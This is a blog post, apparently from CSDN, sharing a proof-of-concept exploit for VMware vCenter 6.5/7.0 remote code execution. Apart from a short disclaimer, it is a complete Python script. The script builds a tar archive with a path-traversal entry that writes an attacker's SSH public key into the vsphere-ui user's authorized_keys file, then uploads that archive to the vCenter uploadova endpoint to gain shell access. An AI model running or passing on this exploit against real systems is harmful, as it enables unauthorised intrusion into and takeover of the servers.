[PoC Share] VMware vCenter 6.5 / 7.0 Remote Code Execution

Posted by 鸿渐之翼


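Disclaimer:
This PoC program is provided for security research and teaching only. Anyone who uses this information for other purposes bears all legal and joint liability; the CSDN blog platform and the blogger 鸿渐之翼 accept no legal or joint liability.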

import tarfile
import os
from io import BytesIO
import requests

# Route requests through a local intercepting proxy listening on 127.0.0.1:8080.
proxies = {
  "http": "http://127.0.0.1:8080",
  "https": "http://127.0.0.1:8080",
}

def return_zip():
    # Write test.tar containing a single entry whose name uses ../ sequences,
    # so the entry resolves outside the directory the archive is unpacked into.
    with tarfile.open("test.tar", 'w') as tar:
        id_rsa_pub = 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwgGuwNdSGHKvzHsHt7QImwwJ08Wa/+gHXOt+VwZTD23rLwCGVeYmfKObDY0uFfe2O4jr+sPamgA8As4LwdqtkadBPR+EzZB+PlS66RcVnUnDU4UdMhQjhyj/uv3pdtugugJpB9xaLdrUWwGoOLYA/djxD5hmojGdoYydBezsNhj2xXRyaoq3AZVqh1YLlhpwKnzhodk12a7/7EU+6Zj/ee5jktEwkBsVsDLTTWPpSnzK7r+kAHkbYx8fvO3Fk+9jlwadgbmhHJrpPr8gLEhwvrEnPcK1/j+QXvVkgy2cuYxl9GCUPv2wgZCN50f3wQlaJiektm2S9WkN5dLDdX+X4w=='
        tarinfo = tarfile.TarInfo(name='../../../home/vsphere-ui/.ssh/authorized_keys')
        f1 = BytesIO(id_rsa_pub.encode())
        tarinfo.size = len(f1.read())
        f1.seek(0)
        tar.addfile(tarinfo, fileobj=f1)
    # The with block closes the archive; no explicit tar.close() is needed.

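def getshell(url):
    # Send test.tar as the multipart form field "uploadFile" and print the response body.
    try:
        with open('test.tar', 'rb') as f:
            files = {'uploadFile': f}
            r = requests.post(url=url, files=files, proxies=proxies, verify=False).text
        print(r)
    except requests.RequestException:
        print('false')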

if __name__ == "__main__":
    try:
        return_zip()
        url="https://192.168.1.1/ui/vropspluginui/rest/services/uploadova"
        getshell(url)
    except IOError as e:
        raise e

